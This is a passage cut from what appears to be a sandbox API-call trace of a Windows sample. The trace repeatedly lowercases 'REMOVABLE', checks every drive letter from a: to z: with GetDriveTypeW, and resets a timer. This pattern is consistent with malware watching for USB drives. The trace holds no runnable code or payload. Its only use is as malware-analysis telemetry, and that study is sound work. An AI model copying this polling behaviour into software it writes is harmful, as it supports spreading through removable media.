0x1 [0220.903] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.904] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.904] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.904] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0220.904] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0220.904] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.904] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.904] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.904] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0220.904] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.904] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.904] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0220.904] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.905] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.905] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.905] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.905] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0220.905] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.905] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0220.905] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260c0 [0220.905] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.905] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.905] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.905] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260c0 | out: hHeap=0x12c0000) returned 1 [0220.905] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0220.905] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0220.905] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0220.905] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.906] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0220.906] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.906] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0220.906] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.906] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0220.906] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.906] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.906] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.906] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0220.906] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.906] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.906] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.906] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0220.906] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0220.906] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.906] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0220.906] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.906] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.906] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.907] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.907] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0220.907] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0220.907] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.907] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0220.907] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0220.907] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.907] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.907] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.907] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.907] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.907] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.907] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0220.907] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0220.907] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0220.907] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.907] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.908] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.908] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.908] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.908] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.908] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.908] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.909] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.909] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.909] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.909] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.910] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.910] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.910] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.910] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.910] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.911] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.911] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.911] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.911] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.911] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.912] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.912] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0221.579] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0221.579] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0221.579] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0221.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0221.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0221.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0221.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0221.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0221.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0221.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0221.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0221.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0221.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0221.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0221.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0221.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0221.580] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0221.580] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0221.580] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0221.580] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0221.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0221.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0221.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0221.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0221.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0221.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0221.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0221.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0221.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0221.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0221.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0221.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0221.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0221.581] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0221.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0221.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0221.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0221.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0221.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0221.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0221.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0221.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0221.581] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0221.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0221.582] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0221.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0221.582] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0221.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0221.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0221.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0221.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0221.582] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0221.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0221.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0221.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0221.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0221.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0221.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0221.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0221.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0221.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0221.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0221.582] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0221.582] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0221.583] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0221.583] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0221.583] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0221.583] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0221.583] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0221.583] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0221.584] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0221.584] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0221.584] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0221.584] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0221.584] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0221.585] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0221.585] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0221.585] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0221.585] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0221.586] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0221.586] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0221.586] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0221.586] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0221.586] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0221.587] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0221.587] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0221.587] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0221.587] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0221.587] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0221.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0221.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0221.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0221.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0221.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0221.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0221.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0221.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0221.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0221.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0221.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0221.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0221.588] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0221.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0221.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0221.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0221.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0221.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0221.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0221.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0221.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0221.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0221.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0221.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0221.589] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0221.589] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0221.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0221.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0221.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0221.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0221.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0221.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0221.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0221.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0221.589] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0221.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0221.589] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0221.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0221.590] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0221.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0221.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0221.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0221.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0221.590] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0221.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0221.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0221.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0221.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0221.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0221.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0221.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0221.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0221.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0221.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0221.590] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0221.590] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0221.590] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0221.590] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0221.590] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0221.591] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0221.591] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0221.591] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0221.591] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0221.591] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0221.591] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0221.592] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0221.592] GetDriveTypeW 